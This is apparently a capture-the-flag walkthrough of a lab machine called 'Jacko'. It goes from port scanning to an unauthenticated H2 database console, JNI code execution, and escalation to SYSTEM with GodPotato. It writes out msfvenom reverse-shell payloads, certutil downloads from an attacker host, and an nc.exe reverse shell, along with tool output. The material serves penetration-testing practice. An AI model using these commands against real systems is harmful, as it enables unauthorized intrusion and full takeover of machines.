Jacko
Last updated
Last updated
Nmap scan:
$ nmap -p- --min-rate 4000 192.168.197.66
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-04 18:07 +08
Nmap scan report for 192.168.197.66
Host is up (0.17s latency).
Not shown: 65520 closed tcp ports (conn-refused)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
5040/tcp open unknown
8082/tcp open blackice-alerts
9092/tcp open XmlIpcRegSvc
41213/tcp filtered unknown
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
57199/tcp filtered unknown
Lots of ports. I did a detailed nmap
scan to further enumerate the ports. We would find a H2 Instance on one of the ports from this scan:
$ sudo nmap -p 80,135,139,445,5040,8082,9092 -sC -sV -O -T4 -Pn 192.168.197.66
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-04 18:25 +08
Nmap scan report for 192.168.197.66
Host is up (0.17s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: H2 Database Engine (redirect)
| http-methods:
|_ Potentially risky methods: TRACE
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
5040/tcp open unknown
8082/tcp open http H2 database http console
|_http-title: H2 Console
9092/tcp open XmlIpcRegSvc?
The H2 Database does have a few code execution exploits that might work.
Port 8082 shows us the login to the H2 database.
We can just click 'Connect', and login successfully.
This version has code execution exploits available:
$ searchsploit H2 Database 1.4.199
----------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------- ---------------------------------
H2 Database 1.4.199 - JNI Code Execution | java/local/49384.txt
----------------------------------------------------------- ---------------------------------
To exploit this, we would need to just copy and paste the script contents of the searchsploit
file twice, and we would get RCE:
To get a reverse shell, simply use these 2 commands with a msfvenom
generated payload.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.177 LPORT=21 -f exe > pwn.exe
certutil -urlcache -split -f http://192.168.45.177/pwn.exe C:\\Windows\\Tasks\\pwn.exe
C:\\Windows\\Tasks\\pwn.exe
whoami.exe
is located in C:\Windows\System32
, and this machine has a broken PATH variable.
We can check our privileges using whoami.exe
:
C:\Windows\System32>whoami.exe /priv
whoami.exe /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
The SeImpersonatePrivilege
is enabled, so we can use PrintSpoofer.exe
to exploit this. First, let's download the binary to the machine:
C:\Windows\System32>certutil -urlcache -split -f http://192.168.45.177/PrintSpoofer.exe C:/Windows/Tasks/print.exe
certutil -urlcache -split -f http://192.168.45.177/PrintSpoofer.exe C:/Windows/Tasks/print.exe
**** Online ****
0000 ...
6a00
CertUtil: -URLCache command completed successfully.
However, the exploit seems to fail:
C:\Users\tony\Desktop>.\print.exe -i -c cmd
.\print.exe -i -c cmd
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[-] Operation failed or timed out
So we have to find another way.
We can try using GodPotato.exe
since that privilege is probably the intended solution:
C:\Windows\Tasks>.\godpotato.exe -cmd "cmd /c whoami"
.\godpotato.exe -cmd "cmd /c whoami"
[*] CombaseModule: 0x140725151858688
[*] DispatchTable: 0x140725154201184
[*] UseProtseqFunction: 0x140725153568784
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] CreateNamedPipe \\.\pipe\509f9274-ba8c-4b7c-844e-55d04cdf359c\pipe\epmapper
[*] Trigger RPCSS
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 00009002-05c4-ffff-2de7-6cc9f11fd1cf
[*] DCOM obj OXID: 0x20259e4ef373758d
[*] DCOM obj OID: 0xdee8046159a66ec5
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 800 Token:0x504 User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 408
Looks like it works well. Now we can download nc.exe
onto the machine and get ourselves another reverse shell.
C:\Windows\Tasks>.\godpotato.exe -cmd "cmd /c C:/Windows/Tasks/nc.exe 192.168.45.177 4444 -e cmd.exe
.\godpotato.exe -cmd "cmd /c C:/Windows/Tasks/nc.exe 192.168.45.177 4444 -e cmd.exe"
[*] CombaseModule: 0x140725151858688
[*] DispatchTable: 0x140725154201184
[*] UseProtseqFunction: 0x140725153568784
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] CreateNamedPipe \\.\pipe\36900a7f-bec3-4dd7-9606-fc8ece7a7d11\pipe\epmapper
[*] Trigger RPCSS
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 00008802-0d1c-ffff-64b7-d6de22e4ee03
[*] DCOM obj OXID: 0x1bb30dc7fc7c0cb7
[*] DCOM obj OID: 0x770fb99694a2c278
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 800 Token:0x504 User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 1592
This is a SYSTEM shell, and we can grab the required flags. Rooted!